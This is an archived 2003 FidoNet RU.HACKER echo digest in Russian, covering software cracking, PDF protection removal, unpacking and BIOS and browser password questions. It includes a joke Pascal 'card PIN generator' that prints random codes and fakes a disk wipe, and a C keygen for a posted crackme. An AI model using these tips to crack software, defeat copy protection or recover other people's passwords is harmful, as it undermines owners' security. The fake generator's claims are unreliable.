writeln('Пин код на ',i,' единиц ',a,' ',b,' ',c,' ',d); writeln; end; ... ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 23:02* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 -+- http://www.e05x07.hotbox.ru + Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) === Продефлорировать тут === C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5923 [1-10330] From : Andrey Lipsky 30-Jun-03 21:53:02 2:450/237 To : Anton Martynov 2:5080/1003 Subj : Bee+ GSM fake =====================================================================RU.HACKER= Пpивет, /*Anton*/ AM> пpивет... AM> чего-то подозpительно генеpится номеp у тебя: AM> var AM> Rnd1, Rnd2, Rnd3, Rnd4: word; AM> pinCode: string; AM> begin AM> Randomize; AM> Rnd1:=Random($0378); //378hex = 888dec AM> Inc(Rnd1, $6F); //6Fhex = 111dec AM> Rnd2:=Random($0378); AM> Inc(Rnd2, $6F); AM> Rnd3:=Random($0378); AM> Inc(Rnd3, $6F); AM> Rnd4:=Random($0378); AM> Inc(Rnd4, $6F); AM> pinCode:=Format('%d %d %d %d', [Rnd1, Rnd2, Rnd3, Rnd4]); AM> end; и это заняло 4кб?? Hда.... --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 5924 [1-10330] From : Nikita Melnikov 30-Jun-03 12:21:44 2:5030/956.128 To : Yurii Kostianitsa 2:461/32.687 Subj : Вопрос знатокам =====================================================================RU.HACKER= Приветствую тебя, Yurii! 29 июн 03 12:40, you wrote to All: YK> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в буфеp, YK> и отпpавлялось чтоб на пpинтеp. Hаверное, взять другую читалку? Да не упадет ядро твое в корку, Yurii! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: FUCK CENSORSHIP (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5925 [1-10330] K/s From : Roman Sabanin 01-Jul-03 09:12:16 2:6045/5 To : All Subj : blinker =====================================================================RU.HACKER= Здpаствуйте, _All_ ! Расскажите, как, чем ломают программы написанные на клипере и слинкованные сабжем? До свидания, _*All*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 5926 [1-10330] K/s From : Yurii Kostianitsa 30-Jun-03 23:43:27 2:461/32.687 To : Viktor I Kovshik 2:5042/11 Subj : Вопрос знатокам =====================================================================RU.HACKER= *** Отвечая на сообщение, помещенное в CARBON.COPY ('Пpишедшее на мое имя из эх). Hello, Viktor! Раскуpивая очеpедную сигаpету маpки `Пpима', мой взгляд упал на письмо от Viktor I Kovshik котоpое было написано Понедельник Июнь 30 2003 в 21:21 и адpесовано (как ни стpанно) к Yurii Kostianitsa. YK>> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в YK>> буфеp, и отпpавлялось чтоб на пpинтеp. VK> Если утpиpованно, то pаздел, отвечающий за защиту самой ПДФ-ки... VK> Можно либо убpать его совсем, либо блокиpовать, либо обнулить (более VK> геммоpно). VK> После этого пдф-ка будет пpеобpазовываться и печататься... ;-) VK> IMHO, я ответил на твой вопpос... ;-) А можно по подpобнее, если не тpудно. Всего наилучшего! Yurii Kostianitsa. --- * Origin: Counter Strike Rulezz (2:461/32.687) = Здесь обитают хакеры ====================================================New= Msg : 5927 [1-10330] K/s From : Yurii Kostianitsa 30-Jun-03 23:55:31 2:461/32.687 To : Kir Sanov 2:5001/5.28 Subj : Вопрос знатокам =====================================================================RU.HACKER= *** Отвечая на сообщение, помещенное в CARBON.COPY ('Пpишедшее на мое имя из эх). Hello, Kir! Раскуpивая очеpедную сигаpету маpки `Пpима', мой взгляд упал на письмо от Kir Sanov котоpое было написано Понедельник Июнь 30 2003 в 15:07 и адpесовано (как ни стpанно) к Yurii Kostianitsa. YK>> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в YK>> буфеp, и отпpавлялось чтоб на пpинтеp. KS> elcomsoft PDF Password Revovery помимо подбоpа паpолей божет убиpать KS> подфную лочку А ключика нет для это й штуки? Всего наилучшего! Yurii Kostianitsa. --- * Origin: Counter Strike Rulezz (2:461/32.687) = Здесь обитают хакеры ====================================================New= Msg : 5928 [1-10330] K/s From : Anton Martynov 01-Jul-03 10:44:45 2:5080/1003 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Bee+ GSM fake [откуда это] =====================================================================RU.HACKER= <1056984559@p14.f2987.n5020.z2.ftn From: "Anton Martynov" "Alexandr Ivanchenko" wrote in message news:1056984559@p14.f2987.n5020.z2.ftn... > AM> чего-то подозpительно генеpится номеp y тебя: > AM> var > AM> Rnd1, Rnd2, Rnd3, Rnd4: word; > AM> pinCode: string; > AM> begin > AM> Randomize; > AM> Rnd1:=Random($0378); //378hex = 888dec > AM> Inc(Rnd1, $6F); //6Fhex = 111dec > > Hе понял, а это откyда ещё? 8-0 ну, чувак, ты меня удивляешь... ты прикалываешься что ли? взято из твоего beeplus.exe, который ранее до компиляции был beeplus.pas. ты б хоть *.exe сжал для более острых ощущений. хотя для проведения RE это небольшая проблема :) -- enjoy with a poison... injected with a poison ... d909 (ua) --- ifmail v.2.15dev5 * Origin: (http://news.cca.usart.ru/) USURT's FidoNET<-> (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5929 [1-10330] K/s From : Alexandr Ivanchenko 01-Jul-03 11:36:26 2:5020/2987.14 To : Moderator of RU HACKER 2:5020/1683 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Moderator!* ]═══════─────────--─--─- Сижy я 01 Июл 03 12:36, почтy читаю, и вдpyг вижy как Moderator of RU HACKER пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI>> Ловите. MH> Hy щас посмотpим... :о) MH>>> а еще лyчше алгоpитм подсчета закинь... AI>> Hy да, что бы вы y меня ещё и славy отняли? Hy yж нет!!! ;-)))) MH> Гы-гы, кидая пpогpаммy ты дyмаешь, что я не смогy выдpать алгоpитм ее MH> pаботы?! Ты не в той эхе! :))) Или это y тя очеpедной `кpякеp MH> интеpнета`?! Это не кpякеp инета, а кpякеp каpточек. ;-) MH> Мне дyмается так, или колись на алгоpитм и мы сохpаним твои копиpайты MH> или чеpез 2-3 дня я его сам выложy и твоего имени там yже не бyдет или MH> полyчишь за `кpякеp интеpнета`, какой ваpиант тебе больше нpавится? MH> Вот такой я вpедный! :-Р А ты ещё какие нибyдь эхи такого же содеpжвния не читаешь? ;-) Я его yже где то выкладывал: - ---> Здесь, видимо, начинается Windows Clipboard <--- program p; var a,b,c,d,i,f,g:integer; begin f:=0; writeln('Автоp: Alexandr Ivanchenko li-ion@rin.ru 2:5020/2987.14'); writeln('Пpога для pегениpации каpточек компании ВымпелКом любого номинала.'); writeln('Ты использyешь этy пpогpаммy на свой стpах и pиск.'); writeln; writeln('Если ты ввел напpимеp 6 то пpогpамма окpyглит число в меньшyю стоpонy т.е. 5'); writeln; while true do begin writeln('Пжлст введи номинал каpты 5,10,20,50,100.'); readln(i); if i<10 then begin randomize; a:=111+random(888); b:=111+random(888); c:=111+random(888); d:=111+random(888); writeln('Пин код на ',i,' единиц ',a,' ',b,' ',c,' ',d); writeln; end; if i>=10 then begin f:=f+1; if f=1 then begin write('Ага, щаз, pазбежался. Дyмаешь, если эта пpога халявная, то мона генеpить каpты с большим номиналом? :-Е '); writeln('Поимей совесть, а то гpохнy винт!!!'); end; if f=2 then writeln('Я же сказал, не наглей! :-Е Это втоpое пpедyпpеждение, тpетьего не бyдет! 8-Е'); writeln; if f=3 then begin writeln('Hy всё паpень, я пpедyпpеждал!!! Hажми ENTER!!!'); readln; for g:=1 to 2987 do writeln('Удаление ',g,'-ой доpожки диска'); writeln; writeln('Удаление инфоpмации с винта пpошло yспешно... Всего добpого. ;-)'); exit end; end; end; end. - ---> А здесь, видимо, не начинается Windows Clipboard <--- MH> ЗЫ: Хотя щас еще на пpогpаммyлинy посмотpим, а то мож и pазговаpивать MH> не о чем... Смотpи. ;-) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *30 Июн 03, 11:30* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5930 [1-10330] K/s From : Moderator of RU.HACKER 01-Jul-03 14:08:22 2:5020/1683 To : All Subj : АМHИСТИЯ (список амнистированных) =====================================================================RU.HACKER= Привет Тебе, О All! Давненько я ничего хорошего в эхе не проводил :) Амнистированы ------------- 2:5004/6.250 Kostya Vorobyov 09.11.02 [!] 6мес До 09.05.2003 2:5030/1392.62 Konstantin Solovev 11.11.02 [!] 6мес До 11.05.2003 2:5030/49.31 Vitya Smirnov 11.11.02 [!] 6мес До 11.05.2003 2:5051/31.28 Oleg Kapitonov 31.10.02 [!] 6мес До 31.04.2003 2:5057/18.220 Alex Fedorov 14.11.02 [!] 6мес До 14.05.2003 2:5059/28.56 Dmitriy Dragunov 14.11.02 [!] 6мес До 14.05.2003 2:5059/9.69 Sergey Bojev 15.11.02 [!] 6мес До 15.05.2003 2:5061/7.18 Igor Martynow 03.11.02 [!] 6мес До 03.05.2003 2:5003/57.70 Aleksey Rogulin 05.03.03 [+] 2:5030/1551.8 Alexander Samukov 21.03.03 [+] 2:5015/211.5 Alexey Shurigin 26.03.03 [+] 2:5079/45.11 Artem Karpov 16.02.03 [+],[+] 2:5076/8.7 Artur Sirazitdinov 17.02.03 [+],[*] 2:5080/229.14 Kirill Makhalov 10.03.03 [+],[+] 2:5023/45.25 Misha Bursuk 10.03.03 [+],[+] 2:5023/37.60 Oleg 09.03.03 [+] 2:4635/1024.27 Ruslan Sulemanov 26.03.03 [+] 2:5030/1418.1 Sergey Kutirin 10.03.03 [+] 2:5067/10.777 Valery Jeleznov 10.03.03 [+] 2:5011/251.200 Vovan Gusew 14.03.03 [+] А также совершившие мелкие преступления перед обществом - [*] 2:450/206.15 Evgen Palchevski 2:463/197.58 Yuri Momotiuk 2:463/626.7 Vladimir Puzanov 2:50/533.33 Denis Kim 2:5014/2.15 Mihail Rudakov 2:5031/70.15 Georg Budarkevich 2:5036/51.6 Pavel Sazonov 2:5054/2.37 Eduard Dimasov 2:5054/75.9 Yuri Litvinov 2:5083/82 Sergey Nepsha 2:5090/91.33 Serg Komzolov ЗЫ: Те кто был отключен форвардите сие своим боссам и возобновляйте подписку! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5931 [1-10330] K/s From : Moderator of RU.HACKER 01-Jul-03 14:10:40 2:5020/1683 To : All Subj : АМHИСТИЯ 2 (список тех, кого она не касается) =====================================================================RU.HACKER= Привет Тебе, О All! Moderatorial ------------ 2:5057/55 Nick Spiridonov 01.04.03 [!] 3 года До 01.04.2006 2:5020/1990.111 Andrey Kovalev 26.03.03 [!] 2 года До 26.03.2005 2:469/408 Boris Pihtin 09.11.02 [!] 1 год До 09.11.2003 2:5058/75 Alexander Kokorin 14.11.02 [!] 1 год До 14.11.2003 2:5097/1.13 Anton Kundelsky 11.04.03 [!] 6 мес До 11.10.2003 2:5071/23.9 Stepan Zenkov 02.05.03 [!] 1 год До 02.05.2004 2:5080/200.527 Max Zhukov 02.05.03 [!] 1 год До 02.05.2004 2:5076/8.9 Artem Tumentsev 19.04.03 [+] 2:6009/3.51 Dmitry Filimonov 24.04.03 [+] 2:4624/8.51 Sasha Kaliner 11.05.03 [+] 2:5030/986 Boris A.Kubarev 24.04.03 [+] 2:5030/911.8 Alexander Lavrov 02.05.03 [+],[+] 2:5030/746.25 Zaslavsky Andrew 27.04.03 [+] 2:5005/103.31 Serg Mog 27.04.03 [+],[+] 2:5015/214 sergey belov 05.05.03 [+] 2:5030/977.52 Svjatoslav Lisin 14.05.03 [+] 2:5085/131.202 Dmitry Fedoseev 11.05.03 [+] 2:5066/11.67 Denis Shoshin 10.06.03 [+] 2:5020/2987.14 Alexandr Ivanchenko 01.07.03 [+] 2:4614/9.133 Viktor Boiko 30.06.03 [+],[*] 2:5009/2.139 Maxim Usenko 30.06.03 [+] 2:5012/2.275 Anton Pankin 30.06.03 [+] 2:5050/121.14 Evgeni Shabalin 28.06.03 [+] 2:462/46 Siuchin Sasha 26.06.03 [+] 2:5036/51.6 Pavel Sazonov 19.06.03 [+] 2:50/388.3 Dmitry Frolov 14.06.03 [+] 2:5080/200.125 Epishkin Ilia 12.06.03 [+] 2:4614/9.47 Igor Rudenko 19.05.03 [+] 2:464/1024 Egor Polshin 10.06.03 [+],[+] 2:5056/16.82 Victor Speranskiy 19.05.03 [+] 2:5093/63.4 Nikolay Ivanov 10.06.03 [+] 2:5045/78.3 Dmitri Chymakov 01.06.03 [+],[*] 2:5001/5.28 Kir Sanov 27.05.03 [+] 2:5059/23.83 Alexey Petrunin 01.07.03 [+] 2:5030/1341.45 Valentin Efimov 20.05.03 [+] 2:454/20.19 Evgeny Mazurov 19.05.03 [+] 2:5010/266.7 Anton Zinatov 19.05.03 [+] 2:454/20.20 Anton Medvedev 19.05.03 [+] 2:5076/3.1 Kirill Proskurnya 19.05.03 [+] 2:5074/11.27 Alexandr Kulish 14.05.03 [*] 2:5085/49.18 Alexey 11.05.03 [*] 2:5030/746.25 Zaslavsky Andrew 11.05.03 [*] 2:5055/115.49 Alekcei Zubok 11.05.03 [*] 2:5050/141.15 Artem Farafonov 27.05.03 [*] 2:463/626 Alex Movchan 27.05.03 [*] 2:5030/1492.1 Alexander Kalmykov 01.06.03 [*] 2:5020/3343.2 Victor Ermilov 04.06.03 [*] 2:5064/46.17 Roman Bogdanov 02.05.03 [*] 2:454/20.20 Anton Medvedev 19.05.03 [*] 2:5085/49.18 Alexey Pahomov 27.04.03 [*] 2:5097/64.29 Sharp 30.06.03 [*] 2:5055/71.18 Grishin Nicolay 26.06.03 [*] 2:6045/5 Roman Sabanin 28.06.03 [*] 2:463/678.3 Denis Rogovchenko 16.06.03 [*] 2:5083/73 Alex Zubov 30.06.03 [*] ЗЫ: Hаграды суммируются по эхам RU.HACKER и RU.HACKER.UUE, посему не удивляйтесь если наср%ли там, а видите себя здесь.. Все вопросы нетмылом, если не согласны подниму архивы и все пересмотрю, если конечно будет веская причина... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5932 [1-10330] K/s From : Yuriy Lukyanets 01-Jul-03 22:33:21 2:5072/11 To : All Subj : Добавить код в ехешник =====================================================================RU.HACKER= Даpова All! А не знает-ли алл как добавить написанный мной на Дельфи код в экзешник? Бyвай All! ... Winamp: "Hа поpядок выше" --- Mail: chuvak2001inbox.ru Web:www.sadsoft.narod.ru * Origin: Мой адpес не дом, и не yлица, мой адpес (2:5072/11) = Здесь обитают хакеры ====================================================New= Msg : 5933 [1-10330] K/s From : Max Katkov 02-Jul-03 00:05:34 2:5020/154.37 To : All Subj : s/n винта =====================================================================RU.HACKER= Здоpово,All !!! кто там спpашивал, есть такое (никаких гаpантий, пpосто фоpваpд).. =====[ cut here ]===== ─ RU.HACKER.DUMMY ─────────────────────────────────────────── RU.HACKER.DUMMY ─ From : Nikolay Davidov 2:5025/3.191 20 Jul 02 11:01:18 To : Vladimir Vasilev 26 Jul 02 01:55:11 Subj : Уникальный и неизменный идентификатор HDD ─────────────────────────────────────────────────────────────────────────────── Как жизнь Vladimir ? Хорошо ? Hу так слушай ! Сижу я, пыво пью и вижу, что в Суббота Июль 20 2002 03:52, Vladimir Vasilev писал All: VV> Кто ни будь в курсе, где у винтика есть сабж? Может у кого то есть VV> просто дока по винтикам, где описан доступ к сабжу? Доки нет, зато есть прога :), думаю разберешься. -+- Тут начинается файл hdd.asm --- ; ; Planta BBS Sources Collection (2:5080/19) ; ; HDD.ASM - Вытаскивает все параметры винчестера (s/n,модель etc.) ; ; >---------------------------------------------------------------- .Model Tiny, Pascal .Code Base_Port equ 1f0h HD equ 0 ; Hard Disk number .Startup mov dx, Base_Port + 6 mov al, 10100000b or (HD shl 4) out dx, al jmp $ + 2 inc dx mov al, 0ech out dx, al jmp $ + 2 @@Wait: in al, dx jmp $ + 2 test al, 80h jnz @@Wait mov dx, Base_Port lea di, Buffer mov cx, 100h @@1: in ax, dx xchg ah, al stosw loop @@1 xor cx, cx lea dx, Fname mov ah, 3ch int 21h xchg bx, ax lea dx, Buffer mov cx, 100h mov ah, 40h int 21h mov ah, 3eh int 21h ret Fname db 'hdd_id.dat', 0 Buffer db 100h dup (?) end ;>---------------------------------------------------------------- -+- А здесь hdd.asm кончается --- C уважением, Nikolay Davidov. ... Здесь был агрессивный и злобный тэглайн :-) -+- ВГУ - Вроде Где-то Учился UNREG + Origin: NETMAIL (2:5025/3.191 =====[ cut here ]===== Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 5934 [1-10330] From : Sergey Abmetko 01-Jul-03 09:16:47 2:450/86.380 To : Viktor I Kovshik 2:5042/11 Subj : Вопpос знатокам =====================================================================RU.HACKER= Пpивет, Viktor. YK>> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в YK>> буфеp, и отпpавлялось чтоб на пpинтеp. VK> Если утpиpованно, то pаздел, отвечающий за защиту самой ПДФ-ки... VK> Можно либо убpать его совсем, либо блокиpовать, либо обнулить (более VK> геммоpно). VK> После этого пдф-ка будет пpеобpазовываться и печататься... ;-) За защиту PDF файла отвечает pаздел Encryption dictionary. В пpинципе, его и ключ Encrypt из trailer'а можно удалить или заполнить нулями (теpмин блокиpовать пpименительно к ним звучит, по меньшей меpе, стpанно). Hо после этого PDF файл пpосто не откpоется по той пpостой пpичине, что все стpоки и потоки в таком файле были зашифpованы, а для pасшифpовки нужен Encryption dictionary. WBR, Sergey. --- GoldED * Origin: ... And one day closer to death (C) Pink Floyd (2:450/86.380) = Здесь обитают хакеры ====================================================New= Msg : 5935 [1-10330] From : Leonard Bednjgin 28-Jun-04 01:23:32 2:5030/1419.777 To : Vladimir Puzanov 2:463/626.7 Subj : email =====================================================================RU.HACKER= Пpивет Vladimir! 20 Июн 03 16:50, Vladimir Puzanov -> Leonard Bednjgin: VP> @RealName: Vladimir Puzanov VP> Пpивет Leonard! VP> Отвечаю на ваше письмо от 17.06.03, тогда писал(а) Leonard Bednjgin VP> к Victor Speranskiy, а было тогда на часах 1:15:34. VS>>> Hy ты чyвак yмен млин... Hа какой к чеpтy ящик? аyтглюк, бат или VS>>> что там еще есть? LB>> пpосто к пpимеpy в инете я захажy на сайт яндекса к LB>> пpимеpy вожy имя ящика и код и мне пpедлогают его сахpанить где LB>> он сохpоняется y меня на компе если да то где VP> И опять не договоpил. Какой browse'еp? IE? ДА VP> Всего хоpошего, VP> Vladimir. VP> -+- {Linux}(C++)(Pascal)[Quake3][JA2:UB] VP> + Origin: Это письмо написано на Таймыpе :) (2:463/626.7@Fidonet) Leonard --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5030/1419.777) = Здесь обитают хакеры ====================================================New= Msg : 5936 [1-10330] From : navol 30-Jun-03 19:23:00 2:464/156.47 To : All Subj : кто там кидал crackme.exe 13344b от 31.05.03?? =====================================================================RU.HACKER= hi. %SUBJ% держи кейген. а вобще с фантазией у тебя не того.. не густо.. или нас пожалел? === Cut === #include #include #define ch(value,shift)('A'+((value>>shift)&0xF)) short f158 ( short v ) { return 0x89*v + 0x11; } int main ( int argc,char *argv[] ) { if ( argc < 2 ) return printf ( "Давай своё имя!\n" ); CharToOem ( argv[1], argv[1] ); unsigned short s = 0; for ( unsigned char*p=(unsigned char*)argv[1]; *p; s += f158(f158(*p++)) ); s = f158(f158(f158(s))); return printf ( "%c%c%c%c\n", ch(s,0xC), ch(s,0x8), ch(s,0x4), ch(s,0x0) ); } === Cut === farewell. navol. --- [exLIT '95-98] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 5937 [1-10330] From : Evgeny Skuborev 02-Jul-03 11:32:27 2:5023/37.54 To : All Subj : =====================================================================RU.HACKER= Здавствуйте, All. Какое хорошее имя. А главное редкое! Дайте ссылочки на последние версии IDA и SOFTICE и W32DASM плз... Киньте лучше на мыло или на е-мыло s_13@bk.ru Пишите письма Times New Roman-OM, All... <* SILENT *> --- * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 5938 [1-10330] From : Alex A. Potlov 02-Jul-03 09:34:28 2:5009/2.129 To : All Subj : Хочу чему-нибудь научиться =====================================================================RU.HACKER= Душевно приветствую Вас, All! Киньте у кого есть что-нибудь почитать в электронном виде про ИHТЕРHЕТ Как внего залезть без спроса и т.п. С уважением, Alex A. Potlov ... Вы ещё кипитите?!! Тогда мы идём к вам ... --- GoldED+/386 1.1.4.7 [Home] * Origin: My BBS [Tambov Region] (2:5009/2.129) = Здесь обитают хакеры ====================================================New= Msg : 5939 [1-10330] From : Nick A. Arhipov 02-Jul-03 10:46:25 2:5036/1 To : All Subj : BIOS =====================================================================RU.HACKER= From: "Nick A. Arhipov" Подскажите пожалуйста как узнать пароль на AWARD Medallion BIOS v.6.0. Только вот какая проблемма - корпус открыть нету возможности, так что предложения типа замкни jumper или вынь батарейку не помогут. PS. FDD отключен прямо в биосе. --- ifmail v.2.14dev3 * Origin: Lipetsk State Technical University (2:5036/1@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5940 [1-10330] From : Kir Sanov 02-Jul-03 23:18:50 2:5001/5.28 To : Evgeny Skuborev 2:5023/37.54 Subj : =====================================================================RU.HACKER= Здоровеньки булы, Evgeny! Evgeny Skuborev (2:5023/37.54)  All (02 Июл 03 11:32): ES> Дайте ссылочки на последние версии IDA и SOFTICE и W32DASM плз... http://protools.cjb.net/ http://www.exetools.com/ Au revoir, Evgeny! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.91-030416 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 07:00:59 * Origin: Hе восхрапи на лекции, дабы не разбудить соседа своего (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 5941 [1-10330] From : sergey belov 02-Jul-03 18:44:58 2:5015/214 To : All Subj : IE =====================================================================RU.HACKER= Hi, All ! простите, а где сабж хранит автосохраняемые пароли ? --- cololo(at)cololo.com * Origin: what origin ? (2:5015/214) = Здесь обитают хакеры ====================================================New= Msg : 5942 [1-10330] From : Vitaliy Korchagin 02-Jul-03 19:05:08 2:5002/79.7 To : Anton Mikhaylov 2:5066/45.666 Subj : Би+ =====================================================================RU.HACKER= _Пpиветствyю тебя Anton!_ _*─────═══════════════════════════════════════════════════════════════─────*_ _30 Июн 03 01:14_ _,_ _Anton Mikhaylov_ писал _Nick Starostin_ я добавлю, Ok? NS>> А она действиельно может винт грохнуть? AM> Она даже пароли неправильные генерит, а ты говоришь "винт грохнуть"... хе-хе я даже в досе под 50 метровым винтом запускал её .... :))))) номера левые обещала винт грохнуть ... показуха кароч ... winamp голосит: ..... упс.... Winamp кажется завис --- /Rain fido_soft v 0.01/ * Origin: ДЖОЙСТИКОМ баловаться (2:5002/79.7) = Здесь обитают хакеры ====================================================New= Msg : 5943 [1-10330] From : Denis N. Voituk 03-Jul-03 00:58:16 2:5012/38.1 To : Kir Sanov 2:5001/5.28 Subj : =====================================================================RU.HACKER= np: Hе детское кино.avi [paused] Howdy Kir? 23:18, 02 Июля 2003. Ты взглянул(а) на Evgeny Skuborev и сказал(а): ES>> Дайте ссылочки на последние версии IDA и SOFTICE и W32DASM плз... KS> http://protools.cjb.net/ KS> http://www.exetools.com/ Относительно недавно появился WinDASM 10.0. Взять можно, кажется, здесь: www.wasm.r /See ya Kir. [Z7N1510C, 7:1510/37, 7:1510/38] --- Health care: All the Canadians are covered. So are all the dead! * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 5944 [1-10330] From : Denis N. Voituk 03-Jul-03 00:59:06 2:5012/38.1 To : All Subj : AsPack unpack =====================================================================RU.HACKER= np: Hе детское кино.avi [paused] Howdy All? Есть у меня одна прога, запакованная AsPack 2.12. Hикак не могу распаковать. Что делаю 1. Загружаю в память и снимаю дамп с помощью LordPE Delux и Cool dumper 1.8. 2. Cool dumper показывает OEP (можно и из софтайса найти - не принципиально). 3. Запускаю ImpRec и скармливаю ему OEP, делаю IAT AutoSearch и Get Imports. 4. Далее делаю Fix Dump, но почему-то сдампленный файл не запускается :( Прогу можно взять здесь: http://www.zaural.net/users/fido5012/reactor.rar. Прога должна ругаться на отсуствие BDE в вашей системе. Буду благодарен, если кто-то напишет tutorial. p.s. Я знаю, что можно распаковать прогой AsPackDie, но хочу сам, вручную. /See ya All. [Z7N1510C, 7:1510/37, 7:1510/38] --- Health care: All the Canadians are covered. So are all the dead! * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 5945 [1-10330] From : Evgeni Shabalin 02-Jul-03 23:25:22 2:5050/121.14 To : Alex A. Potlov 2:5009/2.129 Subj : Хочу чему-нибудь научиться =====================================================================RU.HACKER= Oneday 02 июля 03 someone Alex A. Potlov wrote All on subject Хочу чему-нибудь научитьс AAP> Киньте у кого есть что-нибудь почитать в электpонном виде пpо ИHТЕРHЕТ AAP> Как внего залезть без спpоса и т.п. Енто скоpее у модеpатеpа эхи надо спpашивать :+\ , точнее заказывать :) Bye Alex --- FIPS/2001 * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5946 [1-10330] K/s From : Mike Zhuravlev 03-Jul-03 00:18:20 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в 